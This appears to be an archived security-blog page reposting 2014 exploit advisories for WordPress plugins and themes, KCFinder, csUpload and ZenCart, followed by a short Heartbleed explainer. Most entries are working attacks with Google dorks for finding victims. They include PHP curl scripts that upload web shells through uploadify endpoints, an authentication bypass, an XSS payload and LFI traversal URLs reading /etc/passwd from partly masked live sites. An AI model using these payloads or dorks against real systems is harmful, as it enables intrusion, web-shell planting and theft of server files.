vulnerability

WordPress Booking System SQL Injection vulnerable

By |May 27th, 2014|

Exploit Title: WordPress Booking System (Booking Calendar) plugin SQL Injection
Release Date: 2014-05-21
Author: maodun
Contact: Twitter: @conmancm
Software Link: http://wordpress.org/support/plugin/booking-system
Affected version: < 1.3
Google Dork: inurl:/wp-content/plugins/booking-system/
REF: CVE-2014-3210

Introduction:
Booking System is great for booking hotel rooms, apartments, houses,
villas, rooms etc, make appointments to doctors, dentists, lawyers,
beauty salons, spas, massage therapists etc or schedule events.

SQLi – Proof Of Concept:
vulnerable path:
/wp-content/plugins/booking-system/dopbs-backend-forms.php
vulnerabile parameter:$_POST[‘booking_form_id’]
POC:
POST […]

Comments Off on WordPress Booking System SQL Injection vulnerable

WordPress plugin EZPZ One Click Backup Command Injection

By |May 2nd, 2014|

Product: WordPress plugin EZPZ One Click Backup
Vulnerability type: CWE-78 OS Command Injection
Vulnerable versions: 12.03.10 and some earlier versions
google Dork: intext:plugins/ezpz-one-click-backup/
credits: Henri Salo
Fixed version: N/A
Solution: Remove plugin
Vendor notification: Contact details N/A
WordPress plugins team notification: 2014-04-30
Risk: High
CVE: CVE-2014-3114

Vulnerability Details:

Contains a flaw that is triggered as input passed via the ‘cmd’ parameter in
ezpz-archive-cmd.php is not properly sanitized. With […]

Comments Off on WordPress plugin EZPZ One Click Backup Command Injection

WordPress Themes Theagency File Upload Vulnerability

By |April 29th, 2014|

Title : WordPress Themes Theagency File Upload Vulnerability
Author : AnonBoy
Google Dork : inurl:/wp-content/themes/theagency
Date : 21/04/2014
Facebook : https://www.facebook.com/nufailienafratsim.moechtar
Vandor : N/a
Tested on : Windows 7

POC:
< ?- php

$uploadfile=”x.php.jpg”; $ch = curl_init(“http://localhost/wp-content/themes/theagency/includes/uploadify/uploadify.php”); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘Filedata’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
Shell Access:
http://localhost/wp-content/themes/theagency/includes/uploadify/uploads/x.php.jpg
————————————————————————————–

Greeting:./Trojanspot ./Sacker_Boy ./chliZAceh ./Rijal North Aceh ./Sijulai ./Reja-exe ./TNCA ./Poo Chai ./Mirzja ./hexy khan
./Gantengers Crew

Comments Off on WordPress Themes Theagency File Upload Vulnerability

csUpload Script Site Authentication Bypass

By |April 15th, 2014|

Exploit Title: csUpload Script Site Authentication Bypass
Google Dork: CSUpload.cgi?command=
Date: 4/9/2014
Exploit Author: Satanic2000
Vendor Homepage: http://www.cgiscript.net
Software Link: http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=12
Tested on: linux
vuln: Site.com/[path]/CSUpload/CSUpload.cgi
[path] : /cgi-script/ or /cgi-bin/ or None
Example:
1- http://localhost/cgi-bin/CSUpload//CSUpload.cgi?command=login

2- Bypass Authentication http://localhost/cgi-bin/CSUpload/CSUpload.cgi

3- Select Database Select Databases And Upload (File,Or Shell)
Special tnx S3Ri0uS . Pejvak . l3l4ck.$c0rpi0n And Other Friend

Comments Off on csUpload Script Site Authentication Bypass

WordPress Theme LineNity LFI Vulnerability

By |April 15th, 2014|

exploit title: Local File Inclusion in WordPress Theme LineNity
Date: 13/04/2014
Google Dorks: inurl:wp-content/themes/linenity/
Risk: High
Author: Felipe Andrian Peixoto
Vendor Homepage: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803
Contact: [email protected]
Tested on: Windows 7 and Linux
Vulnerable File: download.php
Exploit :
http://host/wp-content/themes/linenity/functions/download.php?imgurl=[ Local File Inclusion ]
PoC:
http://www.moXm-o-tron.com/wp-content/themes/linenity/functions/download.php?imgurl=../../../../index.php

http://sporX.ut.ee/wp-content/themes/linenity/functions/download.php?imgurl=../../../../../../../../../../../../../../..
/etc/passwd
http://lokXetpln.us.st//wp-content/themes/linenity/functions/download.php?imgurl=download.php

Comments Off on WordPress Theme LineNity LFI Vulnerability

Everything you need to know about the Heartbleed SSL bug

By |April 12th, 2014|

Massive. Huge. Catastrophic. These are all headlines I’ve seen today that basically say we’re now well and truly screwed when it comes to security on the internet. Specifically though, it’s this:
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software.
Every […]

Comments Off on Everything you need to know about the Heartbleed SSL bug

KCFinder 2.53 Shell Upload vulnerability

By |April 2nd, 2014|

Exploit Title : KCFinder Upload Shell Vulnerability
Date : 24/04/2014
Google Dork : inurl:/kcfinder/browse.php
Exploit Author : Iranian_Dark_Coders_Team
Home : http://www.idc-team.net
Discovered By : Black.Hack3r
Vendor Homepage : http://kcfinder.sunhater.com/
Version : 2.51 – 2.53
Tested on : Windows 8 & Linux

Events location bug:
http://[localhost]/[path]/kcfinder/config.php
Line 51: ‘deniedExts’ => “exe com msi bat php phps phtml php3 php4 cgi pl”,

Exploit:
http://[localhost]/kcfinder/browse.php
http://[localhost]/[path]/kcfinder/browse.php
Proof:

STEP 1: Go to target link
http://localhost/KCFinder/browse.php

STEP […]

Comments Off on KCFinder 2.53 Shell Upload vulnerability

WP Barclaycart Plugins Arbitrary File Upload Vulnerability

By |March 18th, 2014|

exploit title: WP Barclaycart Plugins Arbitrary File Upload Vulnerability
Author: eX-Sh1Ne
Author Facebook: www.fb.me/ShiNe.gov
Date: 03-2014
GoogleDork: inurl:”wp-content/plugins/barclaycart”

Vulnerable location:

wp-content/plugins/barclaycart/uploadify/uploadify.php

Exploit :

< -?- php $uploadfile="Sh1Ne.php"; $ch = curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”,
‘folder’=>’/wp-content/plugins/barclaycart/uploadify/’));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
– ? ->

Shell Access :

http://localhost/wp-content/plugins/barclaycart/uploadify/Sh1Ne.php
or
http://localhost/wp-content/uploads/[years]/[month]/

Comments Off on WP Barclaycart Plugins Arbitrary File Upload Vulnerability

WP Plugins Premium Gallery Manager Arbitrary File Upload

By |March 18th, 2014|

exploit title: WP Plugins Premium Gallery Manager Arbitrary File Upload
Author: eX-Sh1Ne
Author Facebook: www.fb.me/ShiNe.gov
Date: 03-2014
GoogleDork: inurl:”wp-content/plugins/Premium_Gallery_Manager”

Vulnerable path:
site.com/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php

Exploit:

< -?- php $uploadfile="Sh1Ne.php.jpg"; $ch= curl_init("http://127.0.0.1:8080/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php"); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”,
‘folder’=>’/wp-content/plugins/Premium_Gallery_Manager/uploadify/’));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$postResult=curl_exec($ch);
curl_close($ch);
print”$postResult”;
? >

ShellAccess:

http://localhost:8080/wp-content/plugins/Premium_Gallery_Manager/uploadify/Sh1Ne.php.jpg
or
http://localhost:8080/wp-content/uploads/[years]/[month]/

Comments Off on WP Plugins Premium Gallery Manager Arbitrary File Upload

ZenCart 1.5.1 Multiple Vulnerabilities

By |February 24th, 2014|

Exploit Title: ZenCart v1.5.1 – Multiple Vulnerabilities
Exploit Author: UmPire
Date: 21 Feb 2014
Vendor Homepage: https://www.zen-cart.com/
Version: 1.5.1
Tested on: Windows
Google Dork: inurl:”zc_install/index.php”

Cross Site Scripting Vulnerability
In the fourth step of installation, there are vulnerable fields.
vulnerable input: ” onmouseover=alert(/Hacked/) bad=”

Full Path Disclosure
In the third step of installation there is this vulnerability
Path_Translated = Drive:\\[WebPage-Directiory]\\[USER]\\zen\\zc_install\\index.php

Sensitive phpinfo reading
This is in this path:
http://[Host]/zen/zc_install/includes/phpinfo.php

Demo […]

Comments Off on ZenCart 1.5.1 Multiple Vulnerabilities